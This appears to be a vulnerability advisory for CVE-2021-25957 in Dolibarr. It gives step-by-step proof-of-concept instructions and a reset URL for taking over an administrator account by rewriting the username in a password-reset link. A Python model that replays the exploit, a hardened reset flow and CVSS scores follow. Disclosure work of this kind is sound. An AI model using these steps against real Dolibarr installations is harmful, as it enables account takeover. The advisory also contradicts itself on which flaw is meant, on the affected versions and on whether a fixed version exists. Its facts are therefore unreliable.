
CVE-2021-25957
Date: August 17, 2021
Overview
In the Dolibarr application, versions v3.3.beta1_20121221 through v13.0.2 give admin-level users "Modify" access to change other users' details, but do not check whether the new "Login" name already exists when a user's login is renamed. Because the renamed account's credentials are written over the existing user with the same login name, the victim's password is overwritten and the victim's account is completely taken over.
Details
The Dolibarr application is also vulnerable to account takeover via the password reset functionality, which is the issue the PoC below demonstrates. A low-privileged user (alice) can reset the password of any user in the application by reusing the password reset link she received by email after requesting a forgotten password: the link carries the target username as a plain query parameter that is not tied to the reset secret, so it can be changed to any other login.
PoC Details
For demonstration purposes two users are used: "Admin" (administrator) and "alice" (low-privileged user). Steps 1 and 2 are setup performed as Admin so that the reset email can be delivered; the attack itself (steps 3 to 6) needs only alice's account.

1. Log in to the application and configure the SMTP section (SMTP ID, SMTP password and automatic email sender).
2. Under the Users & Groups tab, click the "alice" user, select Modify and add an email address.
3. From the login page, follow the forgot-password link, enter the low-privileged username "alice" and click "regenerate and send password". A message confirms that an email was sent to "alice".
4. alice receives a password reset link that contains the "username" and the new "password" as an MD5 hash, for example: http://host/user/passwordforgotten.php?action=validatenewpassword&username=alice&password=d41d8cd98f00b204e9800998ecf8427e
5. Copy the link, change the username parameter from "alice" to "Admin" and send the request.
6. "Admin" can now log in to the application with an empty password.

Note that d41d8cd98f00b204e9800998ecf8427e is the MD5 digest of the empty string, which matches the outcome of step 6: the server sets the password of whichever user the URL names to the value behind that hash, and nothing binds the hash to the account that requested the reset.
Affected Environments
2.8.1 to 13.0.2
Prevention
Upgrade to version 14.0.0
Language: PHP
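A runnable model of the reset-link takeover from the PoC above and of a hardened flow, added here as an example: this is not Dolibarr's code, and the record fields (pass_temp, reset_token), the function names and the two sample users are assumptions made for the model. It takes the link quoted in the PoC as input, shows why an md5("") hash validates against any account with no pending reset once the username parameter is rewritten, and contrasts a flow in which the secret itself identifies the user so there is no username to tamper with.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# MD5 of the empty string: the hash that appears in the PoC link.
EMPTY_MD5 = hashlib.md5(b"").hexdigest()  # "d41d8cd98f00b204e9800998ecf8427e"

# Reset link exactly as quoted in the PoC (constructed input for this model).
ALICE_LINK = ("http://host/user/passwordforgotten.php?action=validatenewpassword"
              "&username=alice&password=d41d8cd98f00b204e9800998ecf8427e")


@dataclass
class User:
    login: str
    password: str
    pass_temp: str = ""                # vulnerable model (assumed): pending temp password, "" if none
    reset_token: Optional[str] = None  # hardened model (assumed): sha256 of a random single-use token
    reset_expires: float = 0.0


def fresh_users() -> Dict[str, User]:
    """Constructed sample data: an administrator and a low-privileged user."""
    return {"Admin": User("Admin", "correct horse battery"), "alice": User("alice", "alice-pw")}


def login(users: Dict[str, User], username: str, password: str) -> bool:
    u = users.get(username)
    return u is not None and hmac.compare_digest(u.password, password)


def rewrite_username(link: str, new_username: str) -> str:
    """The attacker's only step: change the username parameter and keep the hash."""
    parts = urlsplit(link)
    query = parse_qs(parts.query)
    query["username"] = [new_username]
    return urlunsplit(parts._replace(query=urlencode(query, doseq=True)))


def validate_vulnerable(users: Dict[str, User], username: str, password_md5: str) -> bool:
    """Vulnerable check (assumed model of the flaw): the hash from the URL is
    compared with md5(pass_temp) of whatever user the URL names. A user with no
    pending reset has pass_temp == "", and md5("") is exactly the hash in the
    link, so the check passes and the victim's password becomes the empty string."""
    u = users.get(username)
    if u is None:
        return False
    if hashlib.md5(u.pass_temp.encode()).hexdigest() == password_md5:
        u.password, u.pass_temp = u.pass_temp, ""
        return True
    return False


def exploit(users: Dict[str, User]) -> bool:
    """Replays the PoC: rewrite alice's link to Admin, submit it, log in as Admin with ''."""
    link = rewrite_username(ALICE_LINK, "Admin")
    q = parse_qs(urlsplit(link).query)
    validate_vulnerable(users, q["username"][0], q["password"][0])
    return login(users, "Admin", "")


# --- hardened flow: the secret identifies the user, the URL does not ---------

def request_reset_hardened(users: Dict[str, User], username: str, ttl: int = 900) -> str:
    """Issue a random, expiring, single-use token and store only its hash."""
    u = users[username]
    token = secrets.token_urlsafe(32)
    u.reset_token = hashlib.sha256(token.encode()).hexdigest()
    u.reset_expires = time.time() + ttl
    return token  # this is all the emailed link needs to carry


def validate_hardened(users: Dict[str, User], token: str, new_password: str) -> bool:
    """Look the user up by the token itself, so there is no username parameter
    to tamper with; reject when nothing is pending, the token has expired or the
    new password is empty/short. The token is consumed on success."""
    presented = hashlib.sha256(token.encode()).hexdigest()
    for u in users.values():
        if u.reset_token is not None and hmac.compare_digest(u.reset_token, presented):
            if time.time() > u.reset_expires or len(new_password) < 8:
                return False
            u.reset_token, u.reset_expires = None, 0.0
            u.password = new_password
            return True
    return False


if __name__ == "__main__":
    users = fresh_users()
    print("vulnerable model: Admin login with empty password ->", exploit(users))
    users = fresh_users()
    tok = request_reset_hardened(users, "alice")
    print("hardened model: alice's token sets only alice's password ->",
          validate_hardened(users, tok, "newpassword1") and login(users, "Admin", "correct horse battery"))
```

The point of the hardened variant is not the stronger hash but the lookup: the server finds the pending reset by the presented secret, so an attacker who rewrites any parameter still only ever reaches the account the token was issued for, and an account with no pending reset has nothing to match.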
Good to know:
Weakness: Weak Password Recovery Mechanism for Forgotten Password (CWE-640)
Upgrade Version: No fix version available
CVSS v3 (vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

| Metric | Value |
|---|---|
| Base Score | 8.8 (computed from the metrics below) |
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | Low |
| User Interaction (UI) | None |
| Scope (S) | Unchanged |
| Confidentiality (C) | High |
| Integrity (I) | High |
| Availability (A) | High |

CVSS v2 (vector AV:N/AC:L/Au:S/C:P/I:P/A:P)

| Metric | Value |
|---|---|
| Base Score | 6.5 (computed from the metrics below) |
| Access Vector (AV) | Network |
| Access Complexity (AC) | Low |
| Authentication (Au) | Single |
| Confidentiality (C) | Partial |
| Integrity (I) | Partial |
| Availability (A) | Partial |